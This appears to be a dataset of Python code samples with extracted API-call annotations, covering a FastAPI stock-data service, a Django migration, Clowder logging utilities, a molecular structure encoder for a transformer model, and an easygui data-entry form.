item_feature_weights = np.ones(shape=self.ICM_train.shape[1])
for feature_name, weight in field_weights.items():
start, end = self.item_feature_to_range_mapper[feature_name]
item_feature_weights[start:end] = item_feature_weights[start:end]*weight
user_feature_weights_diag = sps.diags(item_feature_weights)
self.ICM_train = self.ICM_train.dot(user_feature_weights_diag)
self.model = self.recommender_class(self.URM_train, self.ICM_train)
self.model.fit(**self.recommender_par)
def _compute_item_score(self, user_id_array, items_to_compute=None):
return self.model._compute_item_score(user_id_array=user_id_array, items_to_compute=items_to_compute)
def save_model(self, folder_path, file_name=None):
pass
| [
"numpy.ones",
"scipy.sparse.diags"
] | [((846, 884), 'numpy.ones', 'np.ones', ([], {'shape': 'self.ICM_train.shape[1]'}), '(shape=self.ICM_train.shape[1])\n', (853, 884), True, 'import numpy as np\n'), ((1138, 1169), 'scipy.sparse.diags', 'sps.diags', (['item_feature_weights'], {}), '(item_feature_weights)\n', (1147, 1169), True, 'import scipy.sparse as sps\n')] |
import datetime
import json
import pandas as pd
import yfinance as yf
from yahoofinancials import YahooFinancials
from fastapi import FastAPI
app = FastAPI()
@app.get("/stock/{ticker}")
async def get_stock_data(ticker: str):
ticker_data = yf.Ticker(ticker).info
mktopen = ticker_data["open"]
mkthigh = ticker_data["dayHigh"]
mktlow = ticker_data["dayLow"]
mktvolume = ticker_data["volume"]
mkforwardPE = ticker_data["forwardPE"]
mkforwardEps = ticker_data["forwardEps"]
return {
"open": mktopen,
"high": mkthigh,
"low": mktlow,
"volume": mktvolume,
"forwardPE": mkforwardPE,
"forwardEps": mkforwardEps,
}
# This needs to be completed!
@app.get("/stock/historic/{ticker}")
async def get_historical_data(ticker: str, tperiod: str = "1mo"):
# periods: 1m,2m,5m,15m,30m,60m,90m,1h,1d,5d,1wk,1mo,3mo
ticker_data = yf.Ticker(ticker).history(period=tperiod)
return json.loads(ticker_data.to_json(orient="index", date_format="iso"))
@app.get("/stock/data-options/{ticker}")
async def get_data_options(ticker: str):
tk = yf.Ticker(ticker)
exps = tk.options
# Get options for each expiration
options = pd.DataFrame()
for e in exps:
opt = tk.option_chain(e)
opt = pd.DataFrame().append(opt.calls).append(opt.puts)
opt["expirationDate"] = e
options = options.append(opt, ignore_index=True)
# Bizarre error in yfinance that gives the wrong expiration date
# Add 1 day to get the correct expiration date
options["expirationDate"] = pd.to_datetime(
options["expirationDate"]
) + datetime.timedelta(days=1)
options["dte"] = (
options["expirationDate"] - datetime.datetime.today()
).dt.days / 365
# Boolean column if the option is a CALL
options["CALL"] = options["contractSymbol"].str[4:].apply(lambda x: "C" in x)
options[["bid", "ask", "strike"]] = options[["bid", "ask", "strike"]].apply(
pd.to_numeric
)
options["mark"] = (
options["bid"] + options["ask"]
) / 2 # Calculate the midpoint of the bid-ask
# Drop unnecessary and meaningless columns
options = options.drop(
columns=[
"contractSize",
"currency",
"change",
"percentChange",
"lastTradeDate",
"lastPrice",
]
)
pd.set_option("display.max_rows", 1500)
options = options.to_json(orient="records")
return options
@app.get("/stock/futures-data/{ticker}")
async def get_futures_data(ticker: str):
yahoo_financials_commodities = YahooFinancials(ticker)
daily_commodity_prices = yahoo_financials_commodities.get_historical_price_data(
'2008-09-15', '2018-09-15', 'daily')
futures_data = json.dumps(daily_commodity_prices, indent=4)
return futures_data | [
"fastapi.FastAPI",
"json.dumps",
"pandas.set_option",
"datetime.timedelta",
"datetime.datetime.today",
"pandas.DataFrame",
"yahoofinancials.YahooFinancials",
"yfinance.Ticker",
"pandas.to_datetime"
] | [((150, 159), 'fastapi.FastAPI', 'FastAPI', ([], {}), '()\n', (157, 159), False, 'from fastapi import FastAPI\n'), ((1120, 1137), 'yfinance.Ticker', 'yf.Ticker', (['ticker'], {}), '(ticker)\n', (1129, 1137), True, 'import yfinance as yf\n'), ((1213, 1227), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (1225, 1227), True, 'import pandas as pd\n'), ((2403, 2442), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(1500)'], {}), "('display.max_rows', 1500)\n", (2416, 2442), True, 'import pandas as pd\n'), ((2631, 2654), 'yahoofinancials.YahooFinancials', 'YahooFinancials', (['ticker'], {}), '(ticker)\n', (2646, 2654), False, 'from yahoofinancials import YahooFinancials\n'), ((2801, 2845), 'json.dumps', 'json.dumps', (['daily_commodity_prices'], {'indent': '(4)'}), '(daily_commodity_prices, indent=4)\n', (2811, 2845), False, 'import json\n'), ((247, 264), 'yfinance.Ticker', 'yf.Ticker', (['ticker'], {}), '(ticker)\n', (256, 264), True, 'import yfinance as yf\n'), ((1588, 1629), 'pandas.to_datetime', 'pd.to_datetime', (["options['expirationDate']"], {}), "(options['expirationDate'])\n", (1602, 1629), True, 'import pandas as pd\n'), ((1646, 1672), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (1664, 1672), False, 'import datetime\n'), ((907, 924), 'yfinance.Ticker', 'yf.Ticker', (['ticker'], {}), '(ticker)\n', (916, 924), True, 'import yfinance as yf\n'), ((1732, 1757), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1755, 1757), False, 'import datetime\n'), ((1294, 1308), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (1306, 1308), True, 'import pandas as pd\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-03-28 06:53
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_auto_20180314_1027'),
]
operations = [
migrations.AddField(
model_name='post',
name='okunmasayisi',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='post',
name='link',
field=models.URLField(blank=True),
),
migrations.AlterField(
model_name='post',
name='video',
field=models.FileField(blank=True, upload_to='BlogVideo'),
),
]
| [
"django.db.models.URLField",
"django.db.models.FileField",
"django.db.models.IntegerField"
] | [((400, 430), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (419, 430), False, 'from django.db import migrations, models\n'), ((548, 575), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)'}), '(blank=True)\n', (563, 575), False, 'from django.db import migrations, models\n'), ((694, 745), 'django.db.models.FileField', 'models.FileField', ([], {'blank': '(True)', 'upload_to': '"""BlogVideo"""'}), "(blank=True, upload_to='BlogVideo')\n", (710, 745), False, 'from django.db import migrations, models\n')] |
"""Clowder Utils
This module contains utilities that make it easier to work with clowder.
Amongst these utilities is a simple way to initialize the logging system
from either a file or the command line.
"""
import datetime
import json
import logging
import logging.config
import os
import time
import zipfile
import tempfile
import requests
from enum import Enum
import yaml
# this takes advantage of the fact that 0 == False and anything else == True
# pylint: disable=too-few-public-methods
class CheckMessage(Enum):
"""Value to be returned from check_message function.
Based on the result the following actions will happen:
- ignore : the process_message function is not called
- download : the input file will be downloaded and process_message is called
- bypass : the file is NOT downloaded but process_message is still called
"""
ignore = 0
download = 1
bypass = 2
class StatusMessage(Enum):
"""Value of status to be sent to status_update function.
Extractors can still define custom content in the message field
of that function, but the status itself must be one of these. The
full string will be STATUS: MESSAGE.
"""
start = "START"
processing = "PROCESSING"
done = "DONE"
error = "ERROR"
def iso8601time():
if time.daylight == 0:
tz = str.format('{0:+06.2f}', -float(time.timezone) / 3600).replace('.', ':')
else:
tz = str.format('{0:+06.2f}', -float(time.altzone) / 3600).replace('.', ':')
now = datetime.datetime.now().replace(microsecond=0)
return now.isoformat() + tz
def setup_logging(config_info=None):
"""Given config_info setup logging.
If config_info points to a file it will try to load it, and configure
the logging with the values from the file. This supports yaml, json
and ini files.
If config_info is a string, it will try to parse the string as json
and configure the logging system using the parsed data.
Finally if config_info is None it will use a basic configuration for
the logging.
Args:
config_info (string): either a file on disk or a json string that
has the logging configuration as json.
"""
# if logging config is a url, download the file
if config_info:
temp_file = None
if config_info.startswith("http://") or config_info.startswith("https://"):
r = requests.get(config_info)
r.raise_for_status()
(temp_file, abs_path) = tempfile.mkstemp()
with os.fdopen(temp_file, "w") as tmp:
for chunk in r.iter_content(chunk_size=1024):
tmp.write(chunk)
config_info = temp_file
if os.path.isfile(config_info):
if config_info.endswith('.yml'):
with open(config_info, 'r') as configfile:
config = yaml.safe_load(configfile)
logging.config.dictConfig(config)
elif config_info.endswith('.json'):
with open(config_info, 'r') as configfile:
config = json.load(configfile)
logging.config.dictConfig(config)
else:
logging.config.fileConfig(config_info)
else:
config = json.load(config_info)
logging.config.dictConfig(config)
if temp_file:
os.remove(temp_file)
else:
logging.basicConfig(format='%(asctime)-15s [%(threadName)-15s] %(levelname)-7s :'
' %(name)s - %(message)s',
level=logging.INFO)
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARN)
def extract_zip_contents(zipfilepath):
"""Extract contents of a zipfile and return contents as list of file paths
Keyword arguments:
zipfilepath -- path of zipfile to extract
"""
zipobj = zipfile.ZipFile(zipfilepath)
output_folder = zipfilepath.replace(".zip", "")
zipobj.extractall(output_folder)
file_list = []
for root, _, files in os.walk(output_folder):
for currfile in files:
file_list.append(os.path.join(root, currfile))
return file_list
| [
"logging.basicConfig",
"logging.getLogger",
"os.fdopen",
"zipfile.ZipFile",
"logging.config.dictConfig",
"os.path.join",
"requests.get",
"os.path.isfile",
"datetime.datetime.now",
"yaml.safe_load",
"logging.config.fileConfig",
"json.load",
"tempfile.mkstemp",
"os.walk",
"os.remove"
] | [((3926, 3954), 'zipfile.ZipFile', 'zipfile.ZipFile', (['zipfilepath'], {}), '(zipfilepath)\n', (3941, 3954), False, 'import zipfile\n'), ((4090, 4112), 'os.walk', 'os.walk', (['output_folder'], {}), '(output_folder)\n', (4097, 4112), False, 'import os\n'), ((2723, 2750), 'os.path.isfile', 'os.path.isfile', (['config_info'], {}), '(config_info)\n', (2737, 2750), False, 'import os\n'), ((3429, 3564), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)-15s [%(threadName)-15s] %(levelname)-7s : %(name)s - %(message)s"""', 'level': 'logging.INFO'}), "(format=\n '%(asctime)-15s [%(threadName)-15s] %(levelname)-7s : %(name)s - %(message)s'\n , level=logging.INFO)\n", (3448, 3564), False, 'import logging\n'), ((1521, 1544), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1542, 1544), False, 'import datetime\n'), ((2411, 2436), 'requests.get', 'requests.get', (['config_info'], {}), '(config_info)\n', (2423, 2436), False, 'import requests\n'), ((2506, 2524), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {}), '()\n', (2522, 2524), False, 'import tempfile\n'), ((3286, 3308), 'json.load', 'json.load', (['config_info'], {}), '(config_info)\n', (3295, 3308), False, 'import json\n'), ((3321, 3354), 'logging.config.dictConfig', 'logging.config.dictConfig', (['config'], {}), '(config)\n', (3346, 3354), False, 'import logging\n'), ((3390, 3410), 'os.remove', 'os.remove', (['temp_file'], {}), '(temp_file)\n', (3399, 3410), False, 'import os\n'), ((2542, 2567), 'os.fdopen', 'os.fdopen', (['temp_file', '"""w"""'], {}), "(temp_file, 'w')\n", (2551, 2567), False, 'import os\n'), ((3629, 3690), 'logging.getLogger', 'logging.getLogger', (['"""requests.packages.urllib3.connectionpool"""'], {}), "('requests.packages.urllib3.connectionpool')\n", (3646, 3690), False, 'import logging\n'), ((4174, 4202), 'os.path.join', 'os.path.join', (['root', 'currfile'], {}), '(root, currfile)\n', (4186, 4202), False, 'import os\n'), ((2885, 2911), 'yaml.safe_load', 'yaml.safe_load', (['configfile'], {}), '(configfile)\n', (2899, 2911), False, 'import yaml\n'), ((2932, 2965), 'logging.config.dictConfig', 'logging.config.dictConfig', (['config'], {}), '(config)\n', (2957, 2965), False, 'import logging\n'), ((3212, 3250), 'logging.config.fileConfig', 'logging.config.fileConfig', (['config_info'], {}), '(config_info)\n', (3237, 3250), False, 'import logging\n'), ((3102, 3123), 'json.load', 'json.load', (['configfile'], {}), '(configfile)\n', (3111, 3123), False, 'import json\n'), ((3144, 3177), 'logging.config.dictConfig', 'logging.config.dictConfig', (['config'], {}), '(config)\n', (3169, 3177), False, 'import logging\n')] |
from typing import Dict, List, Optional, Union
import numpy as np
import torch
MOLECULAR_ATOMS = (
"H,He,Li,Be,B,C,N,O,F,Ne,Na,Mg,Al,Si,P,S,Cl,Ar,K,Ca,Sc,Ti,V,Cr,Mn,Fe,Co,Ni,Cu,Zn,"
"Ga,Ge,As,Se,Br,Kr,Rb,Sr,Y,Zr,Nb,Mo,Tc,Ru,Rh,Pd,Ag,Cd,In,Sn,Sb,Te,I,Xe,Cs,Ba,La,Ce,"
"Pr,Nd,Pm,Sm,Eu,Gd,Tb,Dy,Ho,Er,Tm,Yb,Lu,Hf,Ta,W,Re,Os,Ir,Pt,Au,Hg,Tl,Pb,Bi,Po,At,"
"Rn,Fr,Ra,Ac,Th,Pa,U,Np,Pu,Am,Cm,Bk,Cf,Es,Fm,Md,No,Lr,Rf,Db,Sg,Bh,Hs,Mt,Ds,Rg,Cn,"
"Nh,Fl,Mc,Lv,Ts,Og"
).split(",")
MOLECULAR_CHARGES = list(range(-15, 16)) + [":", "^", "^^"]
MOLECULAR_BOND_TYPES = [1, 2, 3, 4, 5, 6, 7, 8]
class MolecularEncoder:
"""Molecular structure encoder class.
This class is a kind of tokenizers for MoT model. Every transformer models have
their own subword tokenizers (and it even creates attention masks), and of course
MoT needs its own input encoder. While 3D-molecular structure data is not as simple
as sentences which are used in common transformer model, we create new input encoder
which creates input encodings from the 3D-molecular structure data. Using this, you
can simply encode the structure data and pass to the MoT model.
Args:
cls_token: The name of classification token. Default is `[CLS]`.
pad_token: The name of padding token. Default is `[PAD]`.
"""
# This field is a part of MoT configurations. If you are using MoT model with this
# encoder class, then you can simply define the number of embeddings and attention
# types using this field. The vocabularies are predefined, so you do not need to
# handle the vocabulary sizes.
mot_config = dict(
num_embeddings=[len(MOLECULAR_ATOMS) + 2, len(MOLECULAR_CHARGES) + 2],
num_attention_types=len(MOLECULAR_BOND_TYPES) + 2,
)
def __init__(
self,
cls_token: str = "[CLS]",
pad_token: str = "[PAD]",
):
self.vocab1 = [pad_token, cls_token] + MOLECULAR_ATOMS
self.vocab2 = [pad_token, cls_token] + MOLECULAR_CHARGES
self.vocab3 = [pad_token, cls_token] + MOLECULAR_BOND_TYPES
self.cls_token = cls_token
self.pad_token = pad_token
def collect_input_sequences(self, molecular: Dict[str, List]) -> Dict[str, List]:
"""Collect input sequences from the molecular structure data.
Args:
molecular: The molecular data which contains 3D atoms and their bonding
informations.
Returns:
A dictionary which contains the input tokens and 3d positions of the atoms.
"""
input_ids = [
[self.vocab1.index(self.cls_token)],
[self.vocab2.index(self.cls_token)],
]
position_ids = [[0.0, 0.0, 0.0]]
attention_mask = [1] * (len(molecular["atoms"]) + 1)
for atom in molecular["atoms"]:
input_ids[0].append(self.vocab1.index(atom[3]))
input_ids[1].append(self.vocab2.index(atom[4]))
position_ids.append(atom[:3])
return {
"input_ids": input_ids,
"position_ids": position_ids,
"attention_mask": attention_mask,
}
def create_attention_type_ids(self, molecular: Dict) -> np.ndarray:
"""Create an attention types from the molecular structure data.
MoT supports attention types which are applied to the attention scores
relatively. Using this, you can give attention weights (bond types) directly to
the self-attention module. This method creates the attention type array by using
the bond informations in the molecular structure.
Args:
molecular: The molecular data which contains 3D atoms and their bonding
informations.
Returns:
The attention type array from the bond informations.
"""
max_seq_len = len(molecular["atoms"]) + 1
attention_type_ids = np.empty((max_seq_len, max_seq_len), dtype=np.int64)
attention_type_ids.fill(self.vocab3.index(self.pad_token))
attention_type_ids[0, :] = self.vocab3.index(self.cls_token)
attention_type_ids[:, 0] = self.vocab3.index(self.cls_token)
for first, second, bond_type in molecular["bonds"]:
attention_type_ids[first + 1, second + 1] = self.vocab3.index(bond_type)
attention_type_ids[second + 1, first + 1] = self.vocab3.index(bond_type)
return attention_type_ids
def encode(self, molecular: Dict[str, List]) -> Dict[str, Union[List, np.ndarray]]:
"""Encode the molecular structure data to the model inputs.
Args:
molecular: The molecular data which contains 3D atoms and their bonding
informations.
Returns:
An encoded output which contains input ids, 3d positions, position mask, and
attention types.
"""
return {
**self.collect_input_sequences(molecular),
"attention_type_ids": self.create_attention_type_ids(molecular),
}
def collate(
self,
encodings: List[Dict[str, Union[List, np.ndarray]]],
max_length: Optional[int] = None,
pad_to_multiple_of: Optional[int] = None,
) -> Dict[str, Union[List, np.ndarray, torch.Tensor]]:
"""Collate the encodings of which lengths are different to each other.
The lengths of encoded molecular structure data are not exactly same. To group
the sequences into the batch requires equal lengths. To resolve the problem,
this class supports sequence and attention mask paddings. Using this, you can
pad the encodings to desired lengths or match to the longest sequences. In
addition, this method automatically converts the sequences to torch tensors.
Args:
encodings: The batch of encodings.
max_length: The desired maximum length of sequences. Default is `None`.
pad_to_multiple_of: To match the sequence length to be multiple of certain
factor. Default is `None`.
Returns:
The collated batched encodings which contain converted tensors.
"""
longest_length = max(len(enc["input_ids"][0]) for enc in encodings)
max_length = min(max_length or longest_length, longest_length)
if pad_to_multiple_of is not None:
max_length = max_length + pad_to_multiple_of - 1
max_length = max_length // pad_to_multiple_of * pad_to_multiple_of
padding_id_1 = self.vocab1.index(self.pad_token)
padding_id_2 = self.vocab2.index(self.pad_token)
for enc in encodings:
num_paddings = max_length - len(enc["input_ids"][0])
if num_paddings >= 0:
enc["input_ids"][0] += [padding_id_1] * num_paddings
enc["input_ids"][1] += [padding_id_2] * num_paddings
enc["position_ids"] += [[0.0, 0.0, 0.0]] * num_paddings
enc["attention_mask"] += [0] * num_paddings
enc["attention_type_ids"] = np.pad(
enc["attention_type_ids"],
pad_width=((0, num_paddings), (0, num_paddings)),
constant_values=self.vocab3.index(self.pad_token),
)
else:
# If the encoded sequences are longer than the maximum length, then
# truncate the sequences and attention mask.
enc["input_ids"][0] = enc["input_ids"][0][:max_length]
enc["input_ids"][1] = enc["input_ids"][1][:max_length]
enc["position_ids"] = enc["position_ids"][:max_length]
enc["attention_mask"] = enc["attention_mask"][:max_length]
enc["attention_type_ids"] = enc["attention_type_ids"][
:max_length, :max_length
]
# Collect all sequences into their batch and convert them to torch tensor. After
# that, you can use the sequences to the model because all inputs are converted
# to the tensors. Since we use two `input_ids` and handle them on the list, they
# will be converted individually.
encodings = {k: [enc[k] for enc in encodings] for k in encodings[0]}
encodings["input_ids"] = [
torch.tensor([x[0] for x in encodings["input_ids"]]),
torch.tensor([x[1] for x in encodings["input_ids"]]),
]
encodings["position_ids"] = torch.tensor(encodings["position_ids"])
encodings["attention_mask"] = torch.tensor(encodings["attention_mask"])
encodings["attention_type_ids"] = torch.tensor(encodings["attention_type_ids"])
if "labels" in encodings:
encodings["labels"] = torch.tensor(encodings["labels"])
return encodings
| [
"torch.tensor",
"numpy.empty"
] | [((3918, 3970), 'numpy.empty', 'np.empty', (['(max_seq_len, max_seq_len)'], {'dtype': 'np.int64'}), '((max_seq_len, max_seq_len), dtype=np.int64)\n', (3926, 3970), True, 'import numpy as np\n'), ((8457, 8496), 'torch.tensor', 'torch.tensor', (["encodings['position_ids']"], {}), "(encodings['position_ids'])\n", (8469, 8496), False, 'import torch\n'), ((8535, 8576), 'torch.tensor', 'torch.tensor', (["encodings['attention_mask']"], {}), "(encodings['attention_mask'])\n", (8547, 8576), False, 'import torch\n'), ((8619, 8664), 'torch.tensor', 'torch.tensor', (["encodings['attention_type_ids']"], {}), "(encodings['attention_type_ids'])\n", (8631, 8664), False, 'import torch\n'), ((8291, 8343), 'torch.tensor', 'torch.tensor', (["[x[0] for x in encodings['input_ids']]"], {}), "([x[0] for x in encodings['input_ids']])\n", (8303, 8343), False, 'import torch\n'), ((8357, 8409), 'torch.tensor', 'torch.tensor', (["[x[1] for x in encodings['input_ids']]"], {}), "([x[1] for x in encodings['input_ids']])\n", (8369, 8409), False, 'import torch\n'), ((8734, 8767), 'torch.tensor', 'torch.tensor', (["encodings['labels']"], {}), "(encodings['labels'])\n", (8746, 8767), False, 'import torch\n')] |
import easygui
# TODO: In next version use easygui.multenterbox instead of independent enterbox
class Service:
def __init__(self):
self.employerName = easygui.enterbox(msg="Enter Name of Employer", title="Service Visit Inputs")
self.employerAddr = easygui.enterbox(msg="Enter Address of Employer", title="Service Visit Inputs")
self.dateOfJoining = easygui.enterbox(msg="Enter Date of Joining (dd/mm/yyyy)", title="Service Visit Inputs")
self.dateOfCnfrmtn = easygui.enterbox(msg="Enter Date of Confirmation (dd/mm/yyyy)",
title="Service Visit Inputs")
self.phnNo = easygui.enterbox(msg="Enter Mobile Phone Number", title="Service Visit Inputs")
self.telNo = easygui.enterbox(msg="Enter Telephone Number", title="Service Visit Inputs")
self.desig = easygui.enterbox(msg="Enter Designation of Applicant", title="Service Visit Inputs")
self.nameVerif = easygui.boolbox(msg="Was Name of Applicant Verified on Visit?",
title="Service Visit Inputs")
self.addrVerif = easygui.boolbox(msg="Was Address of Applicant's Office Verified on Visit?",
title="Service Visit Inputs")
self.desigVerif = easygui.boolbox(msg="Was Designation of Applicant Verified on Visit?",
title="Service Visit Inputs")
self.dateofVisit = easygui.enterbox(msg="Enter Date of Visit (dd/mm/yyyy)", title="Service Visit Inputs")
self.timeofVisit = easygui.enterbox(msg="Enter Time of Visit", title="Service Visit Inputs")
self.personContacted = easygui.enterbox(msg="Enter Name of Person Contacted", title="Service Visit Inputs")
self.contactedDesig = easygui.enterbox(msg="Designation of Contacted Person", title="Service Visit Inputs")
self.mobileNo = easygui.enterbox(msg="Enter Mobile Number of Contacted Person", title="Service Visit Inputs")
self.yrsBusiness = easygui.enterbox(msg="Number of Years in Present Employment", title="Service Visit Inputs")
self.visitingCard = easygui.boolbox(msg="Was visiting Card of Contacted Person Obtained?",
title="Service Visit Inputs")
self.busiNature = easygui.enterbox(msg="Enter Nature of Business", title="Service Visit Inputs")
self.applJob = easygui.choicebox(msg="Select Type of Job of Applicant?", title="Service Visit Inputs",
choices=["Permanent", "Probation", "Contract Worker", "Temporary Worker",
"Others"])
self.applWorkingAs = easygui.choicebox(msg="Applicant is working in Organisation as:-",
title="Service Visit Inputs",
choices=["Typist", "Stenographer", "Supervisor", "Junior Management",
"Middle Management", "Senior Management", "Other Management"])
self.tranferable = easygui.boolbox(msg="Is Applicant's Job transferable or not?", title="Service Visit Inputs")
self.salaryVerifierName = easygui.enterbox(msg="Enter Name of Person who verified Salary Details of Applicant",
title="Service Visit Inputs")
self.salaryVerifierDesig = easygui.enterbox(msg="Enter Designation of Person who verified"
" Salary Details of Applicant", title="")
self.boolRecom = easygui.boolbox(msg="Select one of following", title="Service Visit Inputs",
choices=["Recommended", "Not Recommended"])
self.remarks = easygui.enterbox(msg="Enter Any Other Remarks", title="Service Visit Inputs")
| [
"easygui.enterbox",
"easygui.choicebox",
"easygui.boolbox"
] | [((167, 243), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Name of Employer"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Name of Employer', title='Service Visit Inputs')\n", (183, 243), False, 'import easygui\n'), ((272, 351), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Address of Employer"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Address of Employer', title='Service Visit Inputs')\n", (288, 351), False, 'import easygui\n'), ((381, 474), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Date of Joining (dd/mm/yyyy)"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Date of Joining (dd/mm/yyyy)', title=\n 'Service Visit Inputs')\n", (397, 474), False, 'import easygui\n'), ((499, 597), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Date of Confirmation (dd/mm/yyyy)"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Date of Confirmation (dd/mm/yyyy)', title=\n 'Service Visit Inputs')\n", (515, 597), False, 'import easygui\n'), ((660, 739), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Mobile Phone Number"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Mobile Phone Number', title='Service Visit Inputs')\n", (676, 739), False, 'import easygui\n'), ((761, 837), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Telephone Number"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Telephone Number', title='Service Visit Inputs')\n", (777, 837), False, 'import easygui\n'), ((859, 948), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Designation of Applicant"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Designation of Applicant', title=\n 'Service Visit Inputs')\n", (875, 948), False, 'import easygui\n'), ((969, 1067), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Was Name of Applicant Verified on Visit?"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Was Name of Applicant Verified on Visit?', title=\n 'Service Visit Inputs')\n", (984, 1067), False, 'import easygui\n'), ((1129, 1238), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Was Address of Applicant\'s Office Verified on Visit?"""', 'title': '"""Service Visit Inputs"""'}), '(msg="Was Address of Applicant\'s Office Verified on Visit?",\n title=\'Service Visit Inputs\')\n', (1144, 1238), False, 'import easygui\n'), ((1302, 1406), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Was Designation of Applicant Verified on Visit?"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Was Designation of Applicant Verified on Visit?',\n title='Service Visit Inputs')\n", (1317, 1406), False, 'import easygui\n'), ((1472, 1563), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Date of Visit (dd/mm/yyyy)"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Date of Visit (dd/mm/yyyy)', title=\n 'Service Visit Inputs')\n", (1488, 1563), False, 'import easygui\n'), ((1586, 1659), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Time of Visit"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Time of Visit', title='Service Visit Inputs')\n", (1602, 1659), False, 'import easygui\n'), ((1691, 1780), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Name of Person Contacted"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Name of Person Contacted', title=\n 'Service Visit Inputs')\n", (1707, 1780), False, 'import easygui\n'), ((1806, 1896), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Designation of Contacted Person"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Designation of Contacted Person', title=\n 'Service Visit Inputs')\n", (1822, 1896), False, 'import easygui\n'), ((1916, 2014), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Mobile Number of Contacted Person"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Mobile Number of Contacted Person', title=\n 'Service Visit Inputs')\n", (1932, 2014), False, 'import easygui\n'), ((2037, 2133), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Number of Years in Present Employment"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Number of Years in Present Employment', title=\n 'Service Visit Inputs')\n", (2053, 2133), False, 'import easygui\n'), ((2157, 2261), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Was visiting Card of Contacted Person Obtained?"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Was visiting Card of Contacted Person Obtained?',\n title='Service Visit Inputs')\n", (2172, 2261), False, 'import easygui\n'), ((2328, 2406), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Nature of Business"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Nature of Business', title='Service Visit Inputs')\n", (2344, 2406), False, 'import easygui\n'), ((2430, 2611), 'easygui.choicebox', 'easygui.choicebox', ([], {'msg': '"""Select Type of Job of Applicant?"""', 'title': '"""Service Visit Inputs"""', 'choices': "['Permanent', 'Probation', 'Contract Worker', 'Temporary Worker', 'Others']"}), "(msg='Select Type of Job of Applicant?', title=\n 'Service Visit Inputs', choices=['Permanent', 'Probation',\n 'Contract Worker', 'Temporary Worker', 'Others'])\n", (2447, 2611), False, 'import easygui\n'), ((2723, 2965), 'easygui.choicebox', 'easygui.choicebox', ([], {'msg': '"""Applicant is working in Organisation as:-"""', 'title': '"""Service Visit Inputs"""', 'choices': "['Typist', 'Stenographer', 'Supervisor', 'Junior Management',\n 'Middle Management', 'Senior Management', 'Other Management']"}), "(msg='Applicant is working in Organisation as:-', title=\n 'Service Visit Inputs', choices=['Typist', 'Stenographer', 'Supervisor',\n 'Junior Management', 'Middle Management', 'Senior Management',\n 'Other Management'])\n", (2740, 2965), False, 'import easygui\n'), ((3130, 3227), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Is Applicant\'s Job transferable or not?"""', 'title': '"""Service Visit Inputs"""'}), '(msg="Is Applicant\'s Job transferable or not?", title=\n \'Service Visit Inputs\')\n', (3145, 3227), False, 'import easygui\n'), ((3257, 3382), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Name of Person who verified Salary Details of Applicant"""', 'title': '"""Service Visit Inputs"""'}), "(msg=\n 'Enter Name of Person who verified Salary Details of Applicant', title=\n 'Service Visit Inputs')\n", (3273, 3382), False, 'import easygui\n'), ((3459, 3570), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Designation of Person who verified Salary Details of Applicant"""', 'title': '""""""'}), "(msg=\n 'Enter Designation of Person who verified Salary Details of Applicant',\n title='')\n", (3475, 3570), False, 'import easygui\n'), ((3646, 3770), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Select one of following"""', 'title': '"""Service Visit Inputs"""', 'choices': "['Recommended', 'Not Recommended']"}), "(msg='Select one of following', title='Service Visit Inputs',\n choices=['Recommended', 'Not Recommended'])\n", (3661, 3770), False, 